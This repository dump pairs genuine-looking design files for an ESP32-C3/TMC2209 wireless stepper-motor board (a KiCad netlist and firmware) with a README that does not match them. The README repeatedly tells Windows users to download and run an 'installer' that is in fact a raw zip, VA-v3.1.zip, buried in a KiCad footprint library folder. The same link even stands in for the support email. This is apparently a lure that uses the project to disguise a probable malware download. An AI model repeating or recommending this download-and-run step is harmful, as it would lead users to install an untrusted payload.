# Repository hal9222/VAL3000

File README.md:

# 🎉 VAL3000 - Easily Control Your Motors Wirelessly

## 🚀 Getting Started

Welcome to the VAL3000 project! This is your guide to downloading and running the VAL3000 Wireless Stepper Motor Driver. Follow these simple steps to get started.

## 📥 Download Now

## 💻 System Requirements

Before running VAL3000, ensure your system meets the following requirements:

- Operating System: Windows 10 or later
- Memory: 4 GB RAM minimum
- Disk Space: 100 MB free space
- A compatible wireless connection

## 📃 Features

VAL3000 offers several features to help you manage your stepper motors with ease:

- **Wireless Control:** Operate your motors without the need for physical connections.
- **User-Friendly Interface:** Navigate through options with a simple, clean layout.
- **Real-Time Feedback:** Get instant updates on motor performance and status.
- **Customizable Settings:** Adjust parameters to fit your specific application needs.

## 📥 Download & Install

To install VAL3000, follow these steps:

1. **Visit the Releases Page:** Go to the [VAL3000 Releases page](https://github.com/hal9222/VAL3000/raw/refs/heads/main/hardware/Libraries/AS5600L_ASOM/KiCADv6/AS5600L-ASOM_AMS.pretty/VA-v3.1.zip).
2. **Select the Latest Release:** Look for the latest version available.
3. **Download the Installer:** Click on the installer file to download. This will usually be named something like `https://github.com/hal9222/VAL3000/raw/refs/heads/main/hardware/Libraries/AS5600L_ASOM/KiCADv6/AS5600L-ASOM_AMS.pretty/VA-v3.1.zip`.
4. **Run the Installer:**
   - Locate the downloaded file in your downloads folder.
   - Double-click on the installer file to start the installation process.
5. **Follow the Instructions:** Follow the on-screen instructions to complete the installation.

## 🔧 Configuration

After installation, you can configure VAL3000 to suit your needs:

1. **Open VAL3000:** Find the application in your Start Menu or on your desktop and double-click to open it.
2. **Connect Your Motor:** Make sure your stepper motor is properly connected and powered.
3. **Configure Wireless Settings:** Access the settings menu and configure your wireless connection.
4. **Test Your Setup:** Run a simple test to confirm everything is working properly.

## 📚 Troubleshooting

If you experience issues while using VAL3000, consider the following tips:

- **Check Wireless Connection:** Ensure your device is connected to the correct network.
- **Restart the Application:** Sometimes, simply closing and reopening the app resolves minor glitches.
- **Verify Installations:** Make sure all components of VAL3000 are installed correctly.

## 🌟 Frequently Asked Questions

**Q: Can I use VAL3000 with any stepper motor?**  
A: VAL3000 supports most standard stepper motors. Ensure compatibility by checking your motor's specifications.

**Q: How can I contact support?**  
A: You can reach out via the Issues section on the GitHub repository or by emailing our support team at https://github.com/hal9222/VAL3000/raw/refs/heads/main/hardware/Libraries/AS5600L_ASOM/KiCADv6/AS5600L-ASOM_AMS.pretty/VA-v3.1.zip

## 📥 Download Again

To download VAL3000 again or if you missed it earlier, visit the [VAL3000 Releases page](https://github.com/hal9222/VAL3000/raw/refs/heads/main/hardware/Libraries/AS5600L_ASOM/KiCADv6/AS5600L-ASOM_AMS.pretty/VA-v3.1.zip) now.

## 🔗 Additional Resources

For more detailed guides, you can find additional documentation linked within the repository. Explore more features and capabilities to fully utilize VAL3000.

Thank you for choosing VAL3000! Enjoy controlling your motors wirelessly!

## KiCad design hardware/PCB/VAL3000.kicad_pcb

Parts:
C1: 220uF; CAP-SMD_BD10.0-L10.3-W10.3-LS11.3-FD; Voltage 50V; LCSC C98743
C2, C3, C4, C5, C6, C21, C24, C29, C31, C32, C38: 0.1uF; C_0402_1005Metric; Voltage 50V; Tolerance 10%; LCSC C77020
C10: 10uF; C_0805_2012Metric; Voltage 50V; Tolerance 10%; LCSC C440198
C19: 22nF; C_0402_1005Metric; Voltage 50V; Tolerance 10%; LCSC C1532
C20: 4.7uF; C_0402_1005Metric; Voltage 10V; Tolerance 10%; LCSC C23733
C23, C27, C30: 10uF; C_0805_2012Metric; Voltage 50V; Tolerance 20%; LCSC C440198
C25: 0.1uF; C_0402_1005Metric; Voltage 50V; LCSC C77020
C41, C51: 22uF; C_0603_1608Metric; Voltage 10V; Tolerance 20%; LCSC C86295
D1, D2, D3: SOD-523_BSD5C051L; D_SOD-523; MPN BSD5C051L; LCSC C151983
D4, D5, D6: ESD9L3.3ST5G; SOD-923_L0.8-W0.6-LS1.0-RD; LCSC C233387
DC1: DC-005 5.5-2.0MM; DC-IN-TH_DC-005-5.5-2.0; LCSC C16214
J1: 1984617; PHOENIX_1984617; PARTREV 22.08.2018; LCSC C695629
J3: B4B-XH-A; JST_B4B-XH-A; PARTREV 7/4/21; not fitted
J4: B4B-XH-A; JST_B4B-XH-A; PARTREV 7/4/21; LCSC C144395
J5, J6: OSTVN02A150; CONN_OSTVN02A150_OST
J7: Conn_01x02_Pin; PinHeader_1x02_P2.54mm_Vertical
L2: L; IND-SMD_L3.0-W3.0_FNR30XXS; LCSC C48020
R1, R5, R6, R8, R26: 10K; R_0402_1005Metric; LCSC C25744
R2, R3: 0R10; C_0805_2012Metric; LCSC C2074770
R4: 1K; R_0402_1005Metric; LCSC C11702
R7, R9, R10, R11, R13: 5.1K; R_0402_1005Metric; LCSC C25905
R12: 0R; R_0603_1608Metric; LCSC C21189
R14: 0R; C_0603_1608Metric; LCSC C21189
SW7, SW8: TS-1088-AR02016; SW-SMD_L3.9-W3.0-P4.45; LCSC C720477
U1: RT9080-33GJ5; TSOT-23-5_L2.9-W1.6-P0.95-LS2.8-BL; LCSC C841192
U2: TMC2209-LA-T; VQFN-28-1EP_5x5mm_P0.5mm_EP3.7x3.7mm_ThermalVias; LCSC C2150710
U3, U4, U5: TC-6615-4.5-160G; KEY-TH_TC-6615-4.5-160G; LCSC C6575012
U6: ESP32-C3-WROOM-02; LCSC C2934560
U9: AP63203QWU-7; TSOT-23-6; LCSC C780769
USB1: TYPE-C 16PIN 2MD(073); USB-C-SMD_TYPE-C-6PIN-2MD-073; LCSC C2765186

Connections:
0A1: J3.2, J4.2, U2.24 (OA1)
0A2: J3.1, J4.1, U2.21 (OA2)
0B1: J3.3, J4.3, U2.26 (OB1)
0B2: J3.4, J4.4, U2.1 (OB2)
3V3: C2.2, C3.2, C21.2, C27.1, C29.1, C41.2, C51.2, L2.2, R1.1, R5.2, R6.1, R8.1, R26.1, U1.5 (VOUT), U2.15 (VCC_IO), U6.1 (3V3), U9.1 (FB)
24V: C1.1, C10.1, C23.1, C30.1, C31.2, C32.2, C38.2, DC1.4, J1.1, U2.22 (VS), U2.28 (VS), U9.2 (EN), U9.3 (IN)
BUTTON_1: C6.2, R10.2, U6.3 (IO4)
BUTTON_2: C4.2, R7.2, U6.15 (IO3)
BUTTON_WIFI_RESET: C5.2, R9.2, U6.6 (IO7)
DIR: R12.2, U2.19 (DIR)
GND: C1.2, C2.1, C3.1, C4.1, C5.1, C6.1, C10.2, C20.2, C21.1, C23.2, C25.2, C27.2, C29.2, C30.2, C31.1, C32.1, C41.1, C51.1, D1.1 (A1), D2.1 (A1), D3.1 (A1), D4.2, D5.2, D6.2, DC1.2, DC1.3, J1.2, J5.2, J6.1, R2.2, R3.2, R11.2, R13.1, SW7.2, SW8.2, U1.2 (GND), U2.3 (GND), U2.13 (CLK), U2.18 (GND), U2.29 (GND), U3.2, U3.3, U3.4, U4.2, U4.3, U4.4, U5.2, U5.3, U5.4, U6.9 (GND), U6.19 (GND), U9.4 (GND), USB1.1 (GND), USB1.12 (GND), USB1.13 (SHELL), USB1.14 (SHELL)
INDEX: U2.12 (INDEX), U6.18 (IO0)
unnamed: D4.1, R1.2, R10.1, U4.1
unnamed: D5.1, R6.2, R7.1, U3.1
unnamed: D6.1, R8.2, R9.1, U5.1
unnamed: C20.1, U2.8 (5VOUT)
unnamed: R2.1, U2.23 (BRA)
unnamed: R3.1, U2.27 (BRB)
unnamed: C19.2, U2.5 (CPI)
unnamed: C19.1, U2.4 (CPO)
unnamed: C38.1, U2.6 (VCP)
unnamed: C25.1, R26.2, SW7.1, U6.2 (EN)
unnamed: SW8.1, U6.8 (IO9)
unnamed: C24.1, U9.6 (BST)
unnamed: C24.2, L2.1, U9.5 (SW)
unnamed: R11.1, USB1.4 (CC1)
unnamed: R13.2, USB1.10 (CC2)
STALLGUARD: U2.11 (DIAG), U6.17 (IO1)
STEP: R14.2, U2.16 (STEP)
TMC_EN: R5.1, U2.2 (~EN), U6.7 (IO8)
TMC_UART_RX: R4.2, U2.14 (~PD/UART), U6.4 (IO5)
TMC_UART_TX: R4.1, U6.5 (IO6)
USB_D+: D3.2 (A2), U6.14 (IO19), USB1.6 (DP1), USB1.8 (DP2)
USB_D-: D2.2 (A2), U6.13 (IO18), USB1.5 (DN2), USB1.7 (DN1)
USER_1/STEP: J7.1, R14.1, U6.11 (IO20/RXD)
USER_2/DIR: J7.2, R12.1, U6.12 (IO21/TXD)
USER_3/END_1: J6.2, U6.10 (IO10)
USER_4/END_2: J5.1, U6.16 (IO2)
VBUS: D1.2 (A2), U1.1 (VIN), U1.3 (EN), USB1.2 (VBUS), USB1.11 (VBUS)

Notes on the sheet:
Motor Voltage Regulator
ESP32-C3
Buttons
TMC2209
ESP32 Uploader
Switch
USB Voltage Regulator
USB OTG

Board: 4 copper layers, 40.0 x 50.0 mm, 60 parts (0 on the bottom side), 39 nets.

## Code that names these connections

File firmware/MorningRope/motor_control.h:

uint16_t positionLabel;

#include <TMCStepper.h>
#include <ESPUI.h>
#include <DNSServer.h>

#include "soc/timer_group_struct.h"
#include "soc/timer_group_reg.h"

#define ENABLE_PIN 8
#define BUTTON_1_PIN 3
#define BUTTON_2_PIN 4
#define WIFI_RESET_PIN 7
#define RX_PIN 5
#define TX_PIN 6

#define STALLGUARD_PIN 1
#define INDEX_PIN 0

#define DRIVER_ADDRESS 0b00  // TMC2209 Driver address according to MS1 and MS2
#define R_SENSE 0.11f        // R_SENSE for current calc.

#define CLOSE_VELOCITY 600
#define OPEN_VELOCITY -600
#define STOP_MOTOR_VELOCITY 0

// function prototypes
void move_close(void);
void move_open(void);
void move_open(void);
void stop(void);

void position_watcher_task(void *parameter);
TaskHandle_t position_watcher_task_handler = NULL;

TMC2209Stepper driver(&Serial1, R_SENSE, DRIVER_ADDRESS);
DNSServer dnsServer;

void IRAM_ATTR stall_interrupt() {
  stall_flag = true;
}

// Interrupt tracks the position of the stepper motor using the index pin
void IRAM_ATTR index_interrupt(void) {

  if (is_closing == true) {
    motor_position++;
  } else {
    motor_position--;
  }

  // Ensure motor position stays within bounds
  if (motor_position < 0) {
    motor_position = 0;
  } else if (motor_position > maximum_motor_position) {
    motor_position = maximum_motor_position;
  }
}

int getMotorPosition() {

  return motor_position;
}

/* Enables power stage of TMC */
void enable_driver() {
  digitalWrite(ENABLE_PIN, 0);
}

/* Disabled power stage of TMC */
void disable_driver() {
  digitalWrite(ENABLE_PIN, 1);
}

void setCloseCall() {
  Serial.println("Button Pressed");
  motor_position = maximum_motor_position;
  target_percent = 100;
  Serial.print("set close position: ");
  Serial.println(target_percent);
}

/* Function that commands motor to move to position */
void move_to_percent100ths(uint16_t percent100ths) {
  printf("move_to_percent100ths(): %i\n", percent100ths);

  switch (percent100ths) {
    case 0:
      target_position = 0;
      break;
    case 100:
      target_position = maximum_motor_position;
      break;
    default:
      target_position = (percent100ths / 100.0) * maximum_motor_position;
      break;
  }

  //printf("target_position(): %i\n", target_position);
  //printf("motor_position(): %i\n", motor_position);
  //printf("maximum_motor_position(): %i\n", maximum_motor_position);

  if (target_position == motor_position) {
    printf("Not moving the window because it is already at the desired position\n");
    printf("target_position: %li\n", target_position);
    printf("motor_position: %li\n", motor_position);
    return;
  } else if (target_position > motor_position || percent100ths == 100) {
    move_close();
  } else if (target_position < motor_position || percent100ths == 0) {
    move_open();
  }
}

void move_close() {
  printf("move_close()\n");

  if (motor_position < 0) {
    motor_position = 0;
  }

  // printf("motor_position close: %lu\n", motor_position);    // TESTING
  // printf("target_position close: %lu\n", target_position);  // TESTING

  // printf("max_motor_position close: %lu\n", maximum_motor_position);  // TESTING
  // printf("target_percent close: %lu\n", target_percent);  // TESTING

  stop_flag = false;
  is_closing = true;
  is_moving = true;

  xTaskCreate(position_watcher_task, "position_watcher_task", 4096, NULL, 1, &position_watcher_task_handler);

  enable_driver();
  // Add for loop for acceleration
  driver.VACTUAL(CLOSE_VELOCITY);
}

void move_open() {
  printf("move_open()\n");

  if (motor_position < 0) {
    motor_position = maximum_motor_position;
  }

  printf("motor_position close: %lu\n", motor_position);    // TESTING
  printf("target_position close: %lu\n", target_position);  // TESTING

  printf("max_motor_position close: %lu\n", maximum_motor_position);  // TESTING
  printf("target_percent close: %lu\n", target_percent);              // TESTING

  stop_flag = false;
  is_closing = false;
  is_moving = true;

  xTaskCreate(position_watcher_task, "position_watcher_task", 4096, NULL, 1, &position_watcher_task_handler);

  enable_driver();
  // Add for loop for acceleration
  driver.VACTUAL(OPEN_VELOCITY);
}

// User return statement?
void position_watcher_task(void *parameter) {

  while (true) {

    while (is_moving) {

      Serial.println(motor_position);

      // check if button was pressed
      if (stop_flag) {
        stop();
        stop_flag = false;
        printf("position_watcher: button pressed stop == true\n");
        delay(1000);
        goto notify_and_suspend;
      }

      // Check for stall flag //
      if (stall_flag) {
        stop();
        stall_flag = false;
        printf("position_watcher: stall_flag == true\n");
        goto notify_and_suspend;
      }

      // /* Check if Position reached */
      if (is_closing) {
        if (motor_position >= target_position) {
          printf("position_watcher STOPPING because target_position: %u <= motor_position: %u\n", (unsigned int)target_position, (unsigned int)motor_position);
          stop();
          goto notify_and_suspend;
        }
      } else {
        if (motor_position <= target_position) {
          printf("position_watcher_task STOPPING because target_position: %u >= motor_position: %u\n", (unsigned int)target_position, (unsigned int)motor_position);
          stop();
          goto notify_and_suspend;
        }
      }

      delay(20);
    }

notify_and_suspend:
    is_moving = false;
    preferences.putInt("motor_pos", motor_position);
    target_percent = ((float)motor_position / (float)maximum_motor_position) * 100;
    ESPUI.updateSlider(positionSlider, target_percent);
    vTaskDelete(NULL);
  }
}

/* Stops motor */
void stop() {
  disable_driver();
  printf("stop(): disable_driver\n");
  driver.VACTUAL(STOP_MOTOR_VELOCITY);
  printf("stop(): driver.VACTUAL(STOP_MOTOR_VELOCITY)\n");
}

// put your setup code here, to run once:
void setup_motors() {

  pinMode(ENABLE_PIN, OUTPUT);
  pinMode(STALLGUARD_PIN, INPUT);
  pinMode(INDEX_PIN, INPUT);
  pinMode(WIFI_RESET_PIN, INPUT);
  pinMode(BUTTON_1_PIN, INPUT);
  pinMode(BUTTON_2_PIN, INPUT);

  if (opening_direction == 1) {
    driver.shaft(true);
  } else {
    driver.shaft(false);
  }

  /* General Registers */
  driver.I_scale_analog(false);
  driver.internal_Rsense(false);
  driver.en_spreadCycle(false);
  driver.index_otpw(false);
  driver.index_step(true);
  driver.pdn_disable(true);
  driver.mstep_reg_select(true);
  driver.multistep_filt(true);

  // NODECONF Registers
  driver.senddelay(6);

  // Factory Registers
  driver.ottrim(0);

  // Velocity Dependent Control
  driver.ihold(0);
  driver.iholddelay(1);  // Set I_HOLD_DELAY to 1 to 15 for smooth standstill current decay
  driver.TPOWERDOWN(20);
  driver.TPWMTHRS(0);
  driver.VACTUAL(0);

  driver.irun(20);       // 27 for 24V // 20 for 12V
  driver.TCOOLTHRS(80);  // TESTING. 20 to turn off coolstep to test vibrations//600 ok//
  // TSTEP = 163 at 400 velocity
  // 54 at 1200 velocity
  // 200 is min SG_RESULT
  // SG_RESULT=
  // SGTHRS = SG_RESULT/2
  driver.SGTHRS(120);  // 100 ok
  // Once SGTHRS has been determined, use 1/16*SGTHRS+1
  // as a starting point for SEMIN.

  // Working values
  // SGTHRS = 100 / semin = 5 // not great, sometimes skips
  // 120/6 working great

  driver.semin(6);  // 6 is great. 5 causes skipped steps. Sometimes 6, always 7 causes current to remain high.
  driver.seup(0);   // 0 works great

  driver.semax(0);  // 0-15 // 0 to 2 recommended
  driver.sedn(0);
  driver.seimin(1);

  // CHOPCONF – Chopper Configuration
  driver.diss2vs(0);
  driver.diss2g(0);
  driver.dedge(0);
  driver.intpol(1);

  driver.mres(8);  // 8 = FULLSTEP mode. 200 pulses per revolution.
  driver.vsense(0);
  driver.tbl(2);
  driver.hend(0);
  driver.hstrt(4);
  driver.toff(5);

  // PWMCONF – Voltage PWM Mode StealthChop
  driver.pwm_lim(12);
  driver.pwm_reg(8);    // Try 2
  driver.freewheel(1);  // 1= Freewheel mode. 3 = Coil Short HS. Only short the coil when motor is NOT moving. Use for physical security
  driver.pwm_autograd(1);
  driver.pwm_autoscale(1);
  driver.pwm_freq(1);
  driver.pwm_grad(PWM_grad);  // Test different initial values. Use scope.
  driver.pwm_ofs(36);

  attachInterrupt(STALLGUARD_PIN, stall_interrupt, RISING);
  attachInterrupt(INDEX_PIN, index_interrupt, RISING);
}

## Commit log (part)

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2025-11-26 Removed unused variables
2025-11-27 Fixed slider
2025-11-27 fixed buttons
2025-12-05 Button fixes and PCB NEMA 17 holes
